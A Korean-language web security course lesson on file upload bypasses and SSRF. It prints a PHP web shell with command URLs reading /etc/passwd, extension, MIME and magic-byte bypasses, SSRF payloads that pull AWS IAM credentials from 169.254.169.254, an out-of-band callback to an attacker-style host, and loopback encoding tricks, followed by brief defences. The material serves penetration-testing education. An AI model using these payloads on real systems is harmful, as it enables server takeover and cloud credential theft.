Cyber Security Academy · 강의

파일 업로드와 SSRF 취약점

파일 업로드 제한을 우회하고 SSRF를 악용해 내부 서비스에 접근하며 취약점을 연계합니다.

레슨 4/413개 단계

파일 업로드와 SSRF 취약점은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 4번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

파일 업로드 취약점

파일 업로드 기능은 웹 애플리케이션에서 위험도가 가장 높은 기능 중 하나입니다. 검증이 충분하지 않으면 실행 가능한 파일(PHP, JSP, ASPX)을 업로드할 수 있고, 서버가 이를 실행하여 원격 코드 실행으로 이어질 수 있습니다.

기본 업로드 우회: 확장자 필터링

클라이언트 측 필터와 블랙리스트 기반 확장자 필터는 우회할 수 있습니다. 이중 확장자(.php.jpg), 대소문자 변형(.PhP), 널 바이트(file.php%00.jpg) 및 대체 확장자(.php5, .phtml, .phar)를 시도하십시오.

# Try alternative PHP extensions:
file.php
file.php5
file.phtml
file.phar
file.php.jpg
file.php%00.jpg
file.PhP

# ASP/ASPX alternatives:
file.asp
file.aspx
file.asa
file.cer

MIME 유형 우회

서버는 실제 파일 내용이 아니라 Content-Type 헤더를 확인하는 경우가 많습니다. Burp에서 업로드 요청을 가로챈 다음 Content-Type을 application/x-php에서 image/jpeg로 변경하십시오.

# In Burp Repeater, modify:
Content-Type: image/jpeg

# While keeping the file content as PHP:
<?php system($_GET["cmd"]); ?>

매직 바이트 우회

일부 서버는 파일의 매직 바이트(파일의 첫 바이트)를 확인합니다. 검사에 통과하면서 실행 가능한 내용을 유지하려면 PHP 페이로드 앞에 유효한 이미지 매직 바이트를 추가하십시오.

# Prepend JPEG magic bytes:
\xFF\xD8\xFF + PHP payload

# Or add GIF header:
GIF89a
<?php system($_GET["cmd"]); ?>

업로드 후 웹 셸

PHP/JSP 파일을 업로드하고 URL을 통해 접근할 수 있게 되면 해당 파일을 실행하여 명령을 실행하십시오. 가장 간단한 웹 셸은 다음과 같습니다:

# Upload this as shell.php:
<?php system($_GET["cmd"]); ?>

# Access via browser:
http://target.com/uploads/shell.php?cmd=id
http://target.com/uploads/shell.php?cmd=whoami
http://target.com/uploads/shell.php?cmd=cat+/etc/passwd

SSRF란 무엇입니까

서버 측 요청 위조(SSRF)는 서버가 공격자를 대신하여 임의의 URL에 HTTP 요청을 보내도록 속이는 공격입니다. 이를 통해 내부 서비스, 클라우드 메타데이터 API 및 내부 관리자 인터페이스에 접근할 수 있습니다.

기본 SSRF 탐지

URL을 받는 매개변수(웹훅, 미리 보기 URL, 가져오기 엔드포인트, 이미지 URL)를 찾으십시오. 내부 주소를 주입하고 응답을 관찰하십시오. 시간 초과, 연결 거부 및 유효한 응답의 차이를 통해 무엇에 접근할 수 있는지 파악할 수 있습니다.

# Test URL parameters:
?url=http://127.0.0.1/
?url=http://169.254.169.254/  # AWS metadata
?url=http://internal-service:8080/admin

# Burp Collaborator for blind SSRF:
?url=http://your-collaborator-id.oastify.com/

SSRF를 통한 AWS 메타데이터 API

169.254.169.254에 있는 AWS 인스턴스 메타데이터 서비스(IMDS)는 IAM 역할 자격 증명을 노출합니다. 이 엔드포인트를 대상으로 한 SSRF는 클라우드 자격 증명을 유출하여 전체 계정 탈취를 가능하게 할 수 있습니다.

# SSRF payload targeting AWS metadata:
?url=http://169.254.169.254/latest/meta-data/
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Returns:
# {"AccessKeyId":"ASIA...", "SecretAccessKey":"..."}

블라인드 SSRF

응답 본문에 반영되는 내용이 없을 때는 대역 외 기법을 사용하십시오. Burp Collaborator로 DNS 조회를 수행하면 연결성을 확인할 수 있고, 경로 데이터가 포함된 HTTP 콜백을 사용하면 정보를 유출할 수 있습니다.

# Interactsh as alternative to Burp Collaborator:
# https://github.com/projectdiscovery/interactsh

?url=http://attacker.interactsh.com/ssrf-test

SSRF 우회 기법

명확한 내부 IP를 차단하는 필터는 IP 인코딩(10진수 0x7f000001 = 127.0.0.1), DNS 재바인딩, 대체 루프백 주소(127.1, 0.0.0.0) 및 URL 리디렉션을 사용하여 우회할 수 있습니다.

# Alternative representations of 127.0.0.1:
http://127.1
http://2130706433  # decimal
http://0x7f000001  # hex
http://0177.0.0.1  # octal
http://localhost

파일 업로드 및 SSRF 방어

파일 업로드: 안전한 확장자만 허용하고, 웹 루트 외부에 저장하며, 서버 측에서 파일 이름을 변경하고, CDN을 통해 제공하십시오. SSRF: 허용된 URL/IP 범위만 허용하고, 불필요한 URL 가져오기 기능을 비활성화하며, AWS에서 IMDSv2를 강제하십시오.

빠른 확인

AWS 자격 증명을 훔치기 위해 SSRF 공격이 대상으로 삼는 IP는 무엇입니까?

요약: 파일 업로드 및 SSRF

파일 업로드 결함은 원격 코드 실행으로 이어지고, SSRF는 내부 네트워크 접근과 자격 증명 탈취로 이어집니다. 확장자, MIME 유형 및 매직 바이트 우회를 사용하여 업로드를 테스트하십시오. localhost, 내부 서브넷 및 클라우드 메타데이터 API를 대상으로 URL 매개변수의 SSRF를 테스트하십시오. 두 문제 모두 블랙리스트보다 허용 목록을 우선하는 방식, 네트워크 분할 및 클라우드 강화 등 심층 방어가 필요합니다.

무료로 시작

AI 튜터와 함께 Cyber Security Academy을(를) 배우세요 — 무료

브라우저에서 실제 코드를 작성하고 실행하며, 24/7 AI 튜터로부터 즉각적인 도움을 받고, 웹이나 앱에서 중단한 부분부터 계속 학습하세요.

코스
76
레슨
303

자주 묻는 질문

“파일 업로드와 SSRF 취약점” 강의는 무료인가요?

네 — “파일 업로드와 SSRF 취약점” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.

“파일 업로드와 SSRF 취약점”에서 뭘 배우나요?

파일 업로드 제한을 우회하고 SSRF를 악용해 내부 서비스에 접근하며 취약점을 연계합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.

Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?

사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 4번째 강의입니다.

“파일 업로드와 SSRF 취약점” 강의는 얼마나 걸리나요?

대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.

이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?

네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.

이 강의의 모든 강의

  1. Burp Suite 프록시와 요청 가로채기
  2. 인젝션 취약점 테스트
  3. 인증과 세션 테스트
  4. 파일 업로드와 SSRF 취약점
← Cyber Security Academy(으)로 돌아가기